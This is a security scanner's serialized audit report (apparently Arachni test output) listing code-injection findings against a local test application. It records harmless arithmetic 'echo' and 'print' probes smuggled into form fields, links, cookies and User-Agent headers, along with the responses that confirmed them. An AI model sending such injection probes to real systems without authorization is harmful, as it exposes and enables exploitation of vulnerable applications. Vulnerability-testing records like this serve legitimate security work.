--- !ruby/object:Arachni::AuditStore plugins: {} sitemap: [] issues: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/php/form/straight elem: form method: POST name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;echo 287630581954+4196403186331128; :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ;echo 287630581954+4196403186331128; :follow_location: true :injected: ;echo 287630581954+4196403186331128; :combo: !binary "aW5wdXQ=": ;echo 287630581954+4196403186331128; :action: http://localhost:6875/php/form/straight :verification: false :id: '4196690816913082' var: 
input url: http://localhost:6875/php/form/straight injected: ;echo 287630581954+4196403186331128; id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: form remarks: {} method: POST response: ! '[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjowMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." 
remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/php/form/append elem: form method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." 
remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;echo 287630581954+4196403186331128; :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": default;echo 287630581954+4196403186331128; :follow_location: true :injected: default;echo 287630581954+4196403186331128; :combo: !binary "aW5wdXQ=": default;echo 287630581954+4196403186331128; :action: http://localhost:6875/php/form/append :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/php/form/append injected: default;echo 287630581954+4196403186331128; id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: form remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjowMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/php/link/append?input=default elem: link method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ! ''';echo 287630581954+4196403186331128;#' :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default';echo 287630581954+4196403186331128;# :follow_location: true :injected: default';echo 287630581954+4196403186331128;# :combo: !binary "aW5wdXQ=": default';echo 287630581954+4196403186331128;# :action: http://localhost:6875/php/link/append?input=default :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/php/link/append?input=default injected: default';echo 287630581954+4196403186331128;# id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: link remarks: {} method: GET response: ! 
'[4196690816913082, 4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjowMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/php/link/straight?input=default elem: link method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;echo 287630581954+4196403186331128; :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": ;echo 287630581954+4196403186331128; :follow_location: true :injected: ;echo 287630581954+4196403186331128; :combo: !binary "aW5wdXQ=": ;echo 287630581954+4196403186331128; :action: http://localhost:6875/php/link/straight?input=default :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/php/link/straight?input=default injected: ;echo 287630581954+4196403186331128; id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: link remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjowMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: cookie2 url: http://localhost:6875/php/cookie/append elem: cookie method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: echo 287630581954+4196403186331128; :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie valueecho 287630581954+4196403186331128; :injected: cookie valueecho 287630581954+4196403186331128; :combo: !binary "Y29va2llMg==": cookie valueecho 287630581954+4196403186331128; :action: http://localhost:6875/php/cookie/append :verification: false :id: '4196690816913082' var: cookie2 url: http://localhost:6875/php/cookie/append injected: cookie valueecho 287630581954+4196403186331128; id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: cookie remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+valueecho+287630581954%2B4196403186331128%3B;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: true references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: cookie url: http://localhost:6875/php/cookie/straight elem: cookie method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: true references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: echo 287630581954+4196403186331128; :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": echo 287630581954+4196403186331128; :injected: echo 287630581954+4196403186331128; :combo: !binary "Y29va2ll": echo 287630581954+4196403186331128; :action: http://localhost:6875/php/cookie/straight :verification: false :id: '4196690816913082' var: cookie url: http://localhost:6875/php/cookie/straight injected: echo 287630581954+4196403186331128; id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: cookie remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=echo+287630581954%2B4196403186331128%3B response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjoxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:6875/php/header/append elem: header method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ;echo 287630581954+4196403186331128; :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: arachni_user;echo 287630581954+4196403186331128; :injected: arachni_user;echo 287630581954+4196403186331128; :combo: User-Agent: arachni_user;echo 287630581954+4196403186331128; :action: http://localhost:6875/php/header/append :verification: false :id: '4196690816913082' var: User-Agent url: http://localhost:6875/php/header/append injected: arachni_user;echo 287630581954+4196403186331128; id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: header remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: arachni_user;echo 287630581954+4196403186331128; Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjoyMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: User-Agent url: http://localhost:6875/php/header/straight elem: header method: GET name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: false references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :injected_orig: ;echo 287630581954+4196403186331128; :altered: User-Agent :element: header :params: :follow_location: true :headers: User-Agent: ;echo 287630581954+4196403186331128; :injected: ;echo 287630581954+4196403186331128; :combo: User-Agent: ;echo 287630581954+4196403186331128; :action: http://localhost:6875/php/header/straight :verification: false :id: '4196690816913082' var: User-Agent url: http://localhost:6875/php/header/straight injected: ;echo 287630581954+4196403186331128; id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: header remarks: {} method: GET response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: ;echo 287630581954+4196403186331128; Cookie: cookie2=cookie+value;cookie=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjoyMSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: true references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby var: input url: http://localhost:6875/perl/form/straight elem: form method: POST name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." 
tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: - !ruby/object:Arachni::Issue verification: true references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: http://www.aspdev.org/asp/asp-eval-execute/ Ruby: http://en.wikipedia.org/wiki/Eval#Ruby opts: :redundant: false :async: true :regexp: '4196690816913082' :match: '4196690816913082' :substring: '4196690816913082' :ignore: :elements: - link - form - cookie - header - body :train: :format: - 2 - 1 :param_flip: false :injected_orig: ;print 287630581954+4196403186331128; :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": ;print 287630581954+4196403186331128; :follow_location: true :injected: ;print 287630581954+4196403186331128; :combo: !binary "aW5wdXQ=": ;print 287630581954+4196403186331128; :action: http://localhost:6875/perl/form/straight :verification: false :id: '4196690816913082' var: input url: http://localhost:6875/perl/form/straight injected: ;print 287630581954+4196403186331128; id: '4196690816913082' regexp: '4196690816913082' regexp_match: '4196690816913082' elem: form remarks: {} method: POST response: ! 
'[4196690816913082]' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMToxNjoyNiBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Code injection description: ! "Arbitrary code can be injected into the web application\n which is then executed as part of the system." tags: - code - injection - regexp cwe: '94' cwe_url: http://cwe.mitre.org/data/definitions/94.html severity: High cvssv2: '7.5' remedy_guidance: ! "User inputs must be validated and filtered\n before being evaluated as executable code.\n Better yet, the web application should stop evaluating user\n inputs as any part of dynamic code altogether." remedy_code: '' metasploitable: unix/webapp/arachni_php_eval mod_name: Code injection variations: [] internal_modname: CodeInjection internal_modname: CodeInjection - !ruby/object:Arachni::Issue verification: true references: PHP: http://php.net/manual/en/function.eval.php Perl: http://perldoc.perl.org/functions/eval.html Python: http://docs.python.org/py3k/library/functions.html#eval ASP: 